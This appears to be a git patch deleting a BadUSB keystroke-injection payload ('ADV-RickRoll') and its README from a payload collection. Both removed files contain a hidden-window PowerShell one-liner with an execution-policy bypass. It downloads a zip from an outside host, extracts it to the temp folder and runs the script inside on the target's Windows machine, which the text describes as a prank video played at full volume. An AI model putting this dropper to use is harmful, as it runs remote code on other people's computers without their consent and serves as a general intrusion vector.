From 21826d693bcdbede1df0894c447dc3b3c7da9525 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 25 Jul 2023 16:23:22 -0500 Subject: [PATCH] Delete Payloads/Flip-ADV-RickRoll directory --- Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt | 18 --- Payloads/Flip-ADV-RickRoll/ReadMe.md | 120 -------------------- 2 files changed, 138 deletions(-) delete mode 100644 Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt delete mode 100644 Payloads/Flip-ADV-RickRoll/ReadMe.md diff --git a/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt b/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt deleted file mode 100644 index c0f5497..0000000 --- a/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt +++ /dev/null @@ -1,18 +0,0 @@ -REM Title: ADV-RickRoll - -REM Author: I am Jakoby - -REM Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume. -REM Upon deployment, payload will pause until a mouse movement is detected and run once one is. - -REM Target: Windows 10, 11 - -REM -------------------------------------------------------------------------------------- -REM THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW. -REM -------------------------------------------------------------------------------------- - -DELAY 2000 -GUI r -DELAY 500 -STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1" -ENTER diff --git a/Payloads/Flip-ADV-RickRoll/ReadMe.md b/Payloads/Flip-ADV-RickRoll/ReadMe.md deleted file mode 100644 index 9addab7..0000000 --- a/Payloads/Flip-ADV-RickRoll/ReadMe.md +++ /dev/null @@ -1,120 +0,0 @@ -![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) - - - -

- - - -

- - -
- Table of Contents -
    -
  1. Description
  2. -
  3. Getting Started
  4. -
  5. Contributing
  6. -
  7. Version History
  8. -
  9. Contact
  10. -
  11. Acknowledgments
  12. -
-
- -# ADV-RickRoll - -A script used to do an advanced rick roll on your target. - -## Description - -This program Rick Rolls your target without opening a muted youtube video. -A Rick Roll video is downloaded and played in your powershell console when a mouse movement is detected. - -## Getting Started - -### Dependencies - -* An internet connection -* Windows 10,11 - -

(back to top)

- -### Executing program - -* Plug in your device -* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload -``` -powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://jakoby.lol/qee' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1" -``` - -

(back to top)

- -## Contributing - -All contributors names will be listed here - -I am Jakoby - -

(back to top)

- -## Version History - -* 0.1 - * Initial Release - -

(back to top)

- - -## Contact - -

📱 My Socials 📱

-
- - - - - - - - -
- - C# - -
YouTube -
- - Python - -
Twitter -
- - Golang - -
Instagram -
- - Jsonnet - -
Discord -
- - Jsonnet - -
TikTok -
-
- -

(back to top)

- - -## Acknowledgments - -* [Hak5](https://hak5.org/) -* [MG](https://github.com/OMG-MG) - -

(back to top)

- -

- Github Stats -